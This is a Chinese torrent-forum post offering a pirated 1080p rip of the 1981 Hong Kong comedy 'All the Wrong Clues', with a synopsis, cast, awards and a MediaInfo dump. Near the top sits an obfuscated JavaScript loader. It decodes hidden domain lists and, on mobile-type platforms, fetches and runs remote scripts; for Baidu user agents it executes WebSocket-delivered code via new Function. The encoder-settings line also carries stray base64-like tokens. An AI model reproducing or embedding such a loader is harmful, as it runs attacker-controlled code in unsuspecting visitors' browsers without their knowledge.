鬼马智多星[国语音轨/中文字幕]All.the.Wrong.Clues.1981.1080p.BluRay.x264.DTS-迅雷下载 11.61GB

版主小s 20天前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 鬼马智多星 / All the Wrong Clues / 夜来香

◎片 名 鬼馬智多星

◎年 代 1981

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 1981-07-23

◎IMDb评分 6.3/10 from 113 users

◎IMDb链接 https://www.imdb.com/title/tt0082485

◎豆瓣评分 6.7/10 from 3058 users

◎豆瓣链接 https://movie.douban.com/subject/1302737/

◎片 长 99分钟

◎导 演 徐克 Hark Tsui

◎编 剧 司徒卓汉 Chuek-Hon Szeto / 黄百鸣 Bak-Ming Wong

◎主 演 岑建勋 John Sham

曾志伟 Eric Tsang

林子祥 George Lam

麦嘉 Karl Maka

泰迪·罗宾 Teddy Robin

姚炜

曹达华 Tat-wah Cho

◎标 签 香港 | 喜剧 | 1981 | 新艺城 | 搞笑 | 电影 | 犯罪 | 中国

◎简 介

30年代的香港,社局动荡,黑帮林立。香港大亨胡老头这日找到私家侦探哎吆(林子祥 饰),要求其调查胡太太,因为他觉得胡太太这些天表现奇怪。哎吆调查后发现,原来是坏蛋神父卡邦派(麦嘉 饰)人勾搭上了胡太,意欲偷取胡老头价值连城的股票。他们这一计划遭哎吆撞破后,四处追杀哎吆。

哎吆亡命之际,又发现了胡老头其实并非什么香港大亨,只是一名老千,他来香港的目的就是要骗卡邦等流氓的钱。胡老头邀请哎吆入伙,一起设局骗卡邦。和好友探长罗宾(泰迪?罗宾 饰)商量后,哎吆决定来个将计就计。

◎获奖情况

第18届台北金马影展(1981)

金马奖 最佳剧情片(提名)

金马奖 最佳导演 徐克

金马奖 最佳原著剧本(提名) 司徒卓汉 / 黄百鸣

金马奖 最佳摄影 黄仲标

金马奖 最佳美术设计(提名) 张叔平

金马奖 最佳剪辑 周国忠

  1. General

  2. Unique ID : 101428879845522293943038896462853881442 (0x4C4E7DDF872292FB719B164BB3E8BE62)

  3. Complete name : All.the.Wrong.Clues.1981.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.6 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate : 16.8 Mb/s

  9. Encoded date : UTC 2021-07-06 08:48:14

  10. Writing application : mkvmerge v57.0.0 ('Till The End') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 38 min

  22. Bit rate : 13.8 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 028 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.291

  33. Stream size : 9.50 GiB (82%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio #1

  40. ID : 2

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 38 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 510 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.04 GiB (9%)

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 1 h 38 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 510 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 24 bits

  70. Compression mode : Lossy

  71. Stream size : 1.04 GiB (9%)

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #1

  76. ID : 4

  77. ID in the original source medium : 4608 (0x1200)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 35 min

  83. Bit rate : 29.1 kb/s

  84. Count of elements : 1978

  85. Stream size : 19.8 MiB (0%)

  86. Language : Chinese

  87. Default : Yes

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #2

  91. ID : 5

  92. ID in the original source medium : 4609 (0x1201)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 35 min

  98. Bit rate : 27.1 kb/s

  99. Count of elements : 1978

  100. Stream size : 18.4 MiB (0%)

  101. Language : Chinese

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #3

  106. ID : 6

  107. ID in the original source medium : 4610 (0x1202)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 35 min

  113. Bit rate : 23.3 kb/s

  114. Count of elements : 1979

  115. Stream size : 15.8 MiB (0%)

  116. Language : English

  117. Default : No

  118. Forced : No

  119. Original source medium : Blu-ray


  120. Menu

  121. 00:00:00.000 : 第 01 章

  122. 00:09:22.728 : 第 02 章

  123. 00:17:23.083 : 第 03 章

  124. 00:30:07.180 : 第 04 章

  125. 00:35:54.193 : 第 05 章

  126. 00:49:12.616 : 第 06 章

  127. 00:56:27.842 : 第 07 章

  128. 01:02:44.719 : 第 08 章

  129. 01:10:26.138 : 第 09 章

  130. 01:15:42.246 : 第 10 章

  131. 01:20:46.383 : 第 11 章

  132. 01:31:23.978 : 第 12 章





此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 喜剧

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回